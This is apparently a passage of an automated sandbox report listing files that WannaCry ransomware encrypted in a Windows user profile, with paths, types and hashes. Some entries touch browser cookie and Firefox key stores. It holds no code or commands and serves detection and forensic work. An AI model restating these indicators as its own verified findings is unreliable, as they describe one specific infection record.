  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\luketaylor\AppData\Local\Microsoft\Windows\Explorer\thumbcache_1024.db.WNCRY (copy)
  • Type:
  • MD5: E7295F916E1129C1258DB235F78E5EE4
  • SHA: FF5A55CA8347A23506047526872273B8BCB37B0A
  • SHA-256: 575EF2C2B826E86146C8E06313471E0949937B88FC146108A634F9EDE67BB2EC
  • SHA-512: E4DE9FF2009A7CDD972A2BD50B00C685FCCF195BE7F1DD6B3E46621F36CFF28E6C4682F0213A26E03F7B8A4FB9C94FE4E57D20A178416A8CC250F1F6F4426418
false
C:\Users\luketaylor\AppData\Local\Microsoft\Windows\Explorer\thumbcache_1024.db.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\luketaylor\AppData\Local\Microsoft\Windows\Explorer\thumbcache_256.db.WNCRY (copy)
  • Type:
  • MD5: 134AB31B47C731A5FD164192E6D43A5D
  • SHA: 965C9121FADFD1BB7C7FCA1CFEFED3720E9AFF7B
  • SHA-256: ECB1067A9BD011860F7B02FD0F006EE3119F093AD244FDAF5A7F462959E40622
  • SHA-512: DE9527164999C428823E410F6BCFC5995FACB766FB2C68BDB1D66D89CE1B698D3CBFFB77378D49002173A31F428D30169743799CED919B393DE871D3F353BA86
false
C:\Users\luketaylor\AppData\Local\Microsoft\Windows\Explorer\thumbcache_256.db.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\luketaylor\AppData\Local\Microsoft\Windows\Explorer\thumbcache_32.db.WNCRY (copy)
  • Type:
  • MD5: 67D1872ED404F114C4E9AC7DD52085B6
  • SHA: 0DFFE20D005B744E77979242A8BA9AC65F697521
  • SHA-256: CA4C679C6FE81AD30756414B6FE52BBEC457275C0FE195BC3374D07BD11511DC
  • SHA-512: 959617C3B47B79B1AB9BE7A76243B095EC7F9A644C7CEC488B8A71BE70848FA378F67A50205D86169031D6FD5305147BC5501FF803B23AAA44C064020291E822
false
C:\Users\luketaylor\AppData\Local\Microsoft\Windows\Explorer\thumbcache_32.db.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\luketaylor\AppData\Local\Microsoft\Windows\Explorer\thumbcache_96.db.WNCRY (copy)
  • Type:
  • MD5: 16A75D07CD0102CD33908B12EF944A4B
  • SHA: B36DC59A54DBCD03199395DFC71131B4FA10438B
  • SHA-256: F16624A29DE9CE5B075A9F2A5FC54FA6D6579F2051931ED3F584DC3D65D70C92
  • SHA-512: 983B5CE84185B2080E16E1B967AABBE8ABE3251025C9AE62376F2881EE774D555E3DA52771BA8196F933198D2F9BD797F41900462EC36B2F7608870A41AEE4B4
false
C:\Users\luketaylor\AppData\Local\Microsoft\Windows\Explorer\thumbcache_96.db.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\luketaylor\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db.WNCRY (copy)
  • Type:
  • MD5: 77FB3B74028DBC6936C23CC7D921104D
  • SHA: 4F3C8850BAADD53C7D6B8C6C13D0ABC6A6A72478
  • SHA-256: 9F4D212530356FC0E0FC81DF1CC6133C2BBF17D6B26F50A481910D57B3A52766
  • SHA-512: 2414AF530308E0A8F497B4F815D0E5FF4206EA003A589CC65AB17D4788914559DF8B00C06F323965CB14AC8EDA6342E8FE904556344EB933F4A34A22830E151B
false
C:\Users\luketaylor\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\luketaylor\AppData\Local\Microsoft\Windows\Explorer\thumbcache_sr.db.WNCRY (copy)
  • Type:
  • MD5: 2DDBF3307B4C7CE58C996957BCCAC285
  • SHA: 9FD0029B0D2A6CFC48FE4C238266497A207F52B4
  • SHA-256: 6DBE03637A5B70332F8B202A65F4F2951461477826ABB02BD7589D7970CFA440
  • SHA-512: 9D4D507117ED78A7FF1F7C7E6510D2570A36031E31108070A09C4423109FBE6AECBD299B1B957A8875B7FBC9336D5567CE2523253BF49DD411274F95BDD5005F
false
C:\Users\luketaylor\AppData\Local\Microsoft\Windows\Explorer\thumbcache_sr.db.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\luketaylor\AppData\Roaming\Microsoft\Document Building Blocks\1033\14\Built-In Building Blocks.dotx.WNCRY (copy)
  • Type:
  • MD5: BE0631C3243DD5EA8A3AA72265351002
  • SHA: 0AE60EDF82C47AD6DA3B8210E72257BE994C05AA
  • SHA-256: 5E7BC1DC7CF5D05253BCB73194BEC679F6B78EF2EE16ED1A3148CA1FCEAA2306
  • SHA-512: 77EDBFA392AC197DE9F3D4169B28DB4BDE036BE401CFB9F6B7E5F81C02EBED0FF23FD633D767A747F2EB9A8CF2554D617610D7CE8DDBD47969E226D04EF5983C
false
C:\Users\luketaylor\AppData\Roaming\Microsoft\Document Building Blocks\1033\14\Built-In Building Blocks.dotx.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\luketaylor\AppData\Roaming\Microsoft\Templates\LiveContent\Managed\Word Document Building Blocks\1033\TM01793060[[fn=Origin]].dotx.WNCRY (copy)
  • Type:
  • MD5: 16DEBF41AD6F3AF8CD57CAEAE31B5024
  • SHA: A35BB8EA0968A89AB22A5B7499F7360F9A6DE6BC
  • SHA-256: 7FC4C41CC41FAB20FE5682F997A7A477F662F2806B947139EAB42A19189040C2
  • SHA-512: 29CF86AD2998B6304ADB87A8343E7ADD22B4AA240321BE7D8F425F6FC1ABA1140EE16798CC41BEE0BAB8AC33CC8275E9CB71757B269A919B54BD67B743D8301C
false
C:\Users\luketaylor\AppData\Roaming\Microsoft\Templates\LiveContent\Managed\Word Document Building Blocks\1033\TM01793060[[fn=Origin]].dotx.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\luketaylor\AppData\Roaming\Microsoft\Templates\Normal.dotm.WNCRY (copy)
  • Type:
  • MD5: C07B3F1CB2119BE505051FE37F9B5C1F
  • SHA: 80593B6DA7B6A5435EB7E24E6C36249F98CB1C63
  • SHA-256: CB2BF8D8512E462D5DCD93A9367B50AE8A99EB4F016876CDC79A05FA6CBBABF9
  • SHA-512: 8A84194B1B1A1F4329367006A4EB6EE7BA1EE46DA0D3806D35CED7F90F14AC1444B484E2F8A56DB43C2E9BB51FFF6905C01069AB09FF9E1E3C2DF75CD8DD9434
false
C:\Users\luketaylor\AppData\Roaming\Microsoft\Templates\Normal.dotm.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Cookies\6SKQ9IC9.txt.WNCRY (copy)
  • Type:
  • MD5: 04F2578C0A8D70D54FB9DBCBA71AE3E9
  • SHA: 7767CBF134E9FCC2C133F1B1470EF2C2EC8035BC
  • SHA-256: A496F3CF33DB3F95965EBD15A3C7D4C63FD18E1C8AC2542C2A653B35D545362B
  • SHA-512: 7C6D9D0699157ADBEEC7E8A4A0C1FA42345785A51487388F4F776F4ACF7498858BCDE41094EDFF4E96E69C72FAB1E818370718972D2C79873FCF1A378C53540C
false
C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Cookies\6SKQ9IC9.txt.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Cookies\70BQC459.txt.WNCRY (copy)
  • Type:
  • MD5: 078A762CAA6360AEF548A15A903514A6
  • SHA: 01014C581F4C9E0FB3D8A18C8F7A20D8E52B6357
  • SHA-256: 0A4BB259FA54A854B7F364FCB0EFDE793048A3278462CC2B4E42D27A691BC9AF
  • SHA-512: 95623EBEBC3BA2529A9FF8B9BD18AF8B6D4F28C7442AF95293874D797CBDFFEF162D5AC4BC1C456EC778A6963F0C4A863CF50946ADCCD8AC71B0810CC308A439
false
C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Cookies\70BQC459.txt.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Cookies\BQV5SLZ9.txt.WNCRY (copy)
  • Type:
  • MD5: 71821D13B81B8D2C4A322FCEBB57A7DE
  • SHA: C915CD9BB2430E2647308B7A85F1B10F1FF97FFA
  • SHA-256: 15DD6436D58B52DCB415AB5B94BEC2A7C141083D44D5E619F3EA9F080853E3FC
  • SHA-512: 974F7014A4D66F77D0F872EC3FFAABAC1E28BFAF45F16A755D6111479C2D53AD294F9F0DADD240901C265FF3BA448290647EEB432A98DFCC04BA8560952BE346
false
C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Cookies\BQV5SLZ9.txt.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Cookies\EVRD7JOF.txt.WNCRY (copy)
  • Type:
  • MD5: 41C6B8D88A1EA4EA1BE1FFC3C9CE5CCC
  • SHA: C24D359804F25D86D86E61983617568601216489
  • SHA-256: FB2F1D919DBC577B99948BFA584263007487D1E4121DC35AD279C63D8F06C951
  • SHA-512: DCCF86C8865C2D76037D65EF8DF4B18EE10CAD57E6CB770A0FF53F47638F24108EBA2424218E7F4EA359D76747EBDBC637C4608AF1C08C50BFE5E801A164D404
false
C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Cookies\EVRD7JOF.txt.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Cookies\I75LB17C.txt.WNCRY (copy)
  • Type:
  • MD5: 56C2FBBE3BA0F86EA10ED0EFACC40863
  • SHA: 8EF9B72D032CC2271802E73E235937AE07E95728
  • SHA-256: 441499B35C716AD81775F00C7E7B89E2FB396617DBEF0CD1E4F0A700762AFFD0
  • SHA-512: 8380D49383AC7250299A721AE4E9F272BEAF501AD5FA6B1298F1FD74ED86C764C6CB96D899BD1DC4E60739561C94043C2A1D015EBE586AAFCB784FD26280772D
false
C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Cookies\I75LB17C.txt.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Cookies\ML8FX5YH.txt.WNCRY (copy)
  • Type:
  • MD5: 2A88F20019198979366ED012637EB500
  • SHA: 726AB540EB041ED261E68A8A16E973E9C2E40889
  • SHA-256: 138BB97DD81008E3257574785F365F9B75CA4E16BB7801B6551CA978F9508E66
  • SHA-512: 5CA3E7568342234181C354BE29A8369A8428A6FC5C3F6754D0F708962203A8781CF2D008D0B9E9FE700EA307F951BEAD8C31F16047B160B5068D5DCA398A42A9
false
C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Cookies\ML8FX5YH.txt.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Cookies\P2JX6PN9.txt.WNCRY (copy)
  • Type:
  • MD5: E74F1F61925D12D8EC4110E5C1DC13ED
  • SHA: 6E531605340D0E8A7E7A2F9A33BBA4C541D7603C
  • SHA-256: 879989086805CAA300DF88FD4D738A87F5EB58528C161D5DF6FC4D78439DBF53
  • SHA-512: 997154EB2C88C56A121B4FDF2315381BDB9D5B4FA625D244815A8A0CDD3D68A78AE59275A38FEDACE9C16842B3FC2D2AAED8F7F98092079D933D5400F4BA5F52
false
C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Cookies\P2JX6PN9.txt.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Cookies\SBGGU5ON.txt.WNCRY (copy)
  • Type:
  • MD5: 3A4D56C0F02006AAC4D453C2DFCA5857
  • SHA: F99A1D8F6C798D1BFD6427DFAFFAD7683999E69A
  • SHA-256: 5523352C310CF00579F70408D922016D84EFB6746032BBAFE6429055CF582620
  • SHA-512: 6A3A50D0A64A9F553207D07CE0F31AB21195A50456D2B4A6EC5977DE532786F539351A27A076DF34EA517A01CD035726DEE38352A394C5642E5E5889DC9C27F2
false
C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Cookies\SBGGU5ON.txt.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Cookies\TS324TLF.txt.WNCRY (copy)
  • Type:
  • MD5: B8CC3C179B89F9F1C28684D75FC45DE7
  • SHA: 83A25C2B07227125C26E84092E2AF0FCDBD6C9CF
  • SHA-256: BD7E843E70384CB327DA650C2E04C9F39ED2221C437ADFE23116411928563743
  • SHA-512: BD34D3BD4485D8F79611AE251B1C4D613E9026BA8FC925940A87C5301E58B309DF762AC1E7A9B0EC6F5D46B628D57CA6DB0C5C58BD27A9607074CB5183CCF636
false
C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Cookies\TS324TLF.txt.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Cookies\XO4C6RUK.txt.WNCRY (copy)
  • Type:
  • MD5: 2B53F07824004FFB5A4F3A298B0E4A39
  • SHA: 497315AE723A6AE115CBA68748D2A241720DA1E2
  • SHA-256: A1BE91532C2FA5165BF2C2BE313352BD40D9D26E736F9461B1DE37089146ECE9
  • SHA-512: 2E5D7945FDB9060A45A2D522253C492D12FB81E8FEC31CFAF4B094DF8EE9641270E3ADC3C0A75819C354523138777EA5F1D34D8022332623FC29EE2FF998B415
false
C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Cookies\XO4C6RUK.txt.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg.WNCRY (copy)
  • Type:
  • MD5: 05FD53378FBE528C3DD264601DFFB1CD
  • SHA: A283D6D89B36EBB34FF0363EC14186079C4F7ED0
  • SHA-256: 5105D48969BFC04279D88CB597EA6DE48EA8EDC7E2C4B109F803AAF8EEDF0B7E
  • SHA-512: 381FDD1472E7A4E6781A9E56014F9178C673536FFD75B44AA3DC2FBD2652190761D2208CFA0974F377E83F4662B49284C1FDBA2FE096090D0F00FD3E15A47CD5
false
C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\luketaylor\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\SiteSecurityServiceState.txt.WNCRY (copy)
  • Type:
  • MD5: F56DE94C729ACDC21B50BF59ADD6C2C0
  • SHA: D6FE7321C40427032EBDB5947BC3BA0511BAAC68
  • SHA-256: E44411D32A6275D7051F062A5A51299575C7342B066AA915297D1FA33B982AE7
  • SHA-512: A07F6420DAA3D14A6DA4C55A529E47AFEEF7F4111DE2A888C5BAA15391B4005CC8305A91E80A962F8D5692C2131D898D3B9503A0111F7F7CE9CDCD8617F373C9
false
C:\Users\luketaylor\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\SiteSecurityServiceState.txt.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
true
C:\Users\luketaylor\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\cert8.db.WNCRY (copy)
  • Type:
  • MD5: 48775BFE360B5F82978025FBC171FA67
  • SHA: 4CFAC026595A697275DB3379014B908A9E986739
  • SHA-256: 54CB6A308741095E3C8E70794E30B82C243BEE318B8D19A9ADE05B1A12E3DE3E
  • SHA-512: BD263B16E94FEE992A14B373A72DED6DFC088A04AF8FA4225FD4C916E806239E16B57B648D8529323CB81546E0DB909A6D0B16BD500123551794B9C83271CF65
false
C:\Users\luketaylor\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\cert8.db.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
true
C:\Users\luketaylor\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\cert_override.txt.WNCRY (copy)
  • Type:
  • MD5: 48657AAB0B3F125FA300514A1733C01B
  • SHA: 28E1BC2B831092CBA2EC551D4086D3E047EBE40E
  • SHA-256: 147EA9AC67E24FC2FA9AD4C2F9F365F1F863B5C26018A0E0F841DFA0BF65F684
  • SHA-512: B8CDB3666DBEB9EA3BEA6554823AAB9152334E9DE59BFAE632C7B58011B20F440275407CDFE718E801356CF3DEC51855EC73CE0E6D88BBF704C00FA381B326CC
false
C:\Users\luketaylor\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\cert_override.txt.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
true
C:\Users\luketaylor\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\key3.db.WNCRY (copy)
  • Type:
  • MD5: 240F668ADAB3AAA0B00D83BB5E7C0E2A
  • SHA: BC4BEB695E05318FCFB178F4A54A6B7B16BE4F74
  • SHA-256: CE7EC7CD549DC83C24FF2F3E72897AC59975888C83147BBF592573B8562ED5F6
  • SHA-512: CA01F7E6A746FA22435B0DE9F104004E54E0380AAD35199A80329F6314C426971A9E277D8F6869AD4C52CA381A836EAF36B8229F7D14EF5B34187A9B06A9E943
false
C:\Users\luketaylor\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\key3.db.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
true
C:\Users\luketaylor\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\prefs.js.WNCRY (copy)
  • Type:
  • MD5: 1C3076197AE1866F14D2B32409124F17
  • SHA: C4EC6C7BF6307249C63BC0D1DB364657C47269E1
  • SHA-256: B141F39A21C7108737BF9D7E22430E0772C5C8F7B7E76A644D8D36F6D524E6BC
  • SHA-512: 9AF7DF9C2E73BA65D93BCD2F20626A1E0CFDEBB668596D13A326600737582454076F572E2B0D4884BC7831D5E7D9503C8FA81B911BA39AF72CC6EAAD36794B4D
false
C:\Users\luketaylor\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\prefs.js.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
true
C:\Users\luketaylor\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\revocations.txt.WNCRY (copy)
  • Type:
  • MD5: 6C46330619A9327BB63720B26D5094E6
  • SHA: EAB43664F48EDC6DBC98B67354F4C5493B6E3A48
  • SHA-256: 3739525C3B107033BD78C6C412E4FA26541C4CEE14FAC934CDF567E77E46908B
  • SHA-512: E478621CC2F917FE46FA63ADD1C02AD899FAFF017E2DBB2F6E2C625B7A356F4370BF06A3A7948EEC21C0F7FF4E36F27DF14232D98A2ABAFDCE5585AEDCBD2103
false
C:\Users\luketaylor\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\revocations.txt.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
true
C:\Users\luketaylor\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\secmod.db.WNCRY (copy)
  • Type:
  • MD5: 7E7945589816EB057E35DF37264C4932
  • SHA: AAF727AD1BEEAFEA574C672F19FD487CB6DF42B6
  • SHA-256: E02ED3DF274139CA1C552D07ADBB417FCA0B9131F4E974AA939511F09206479D
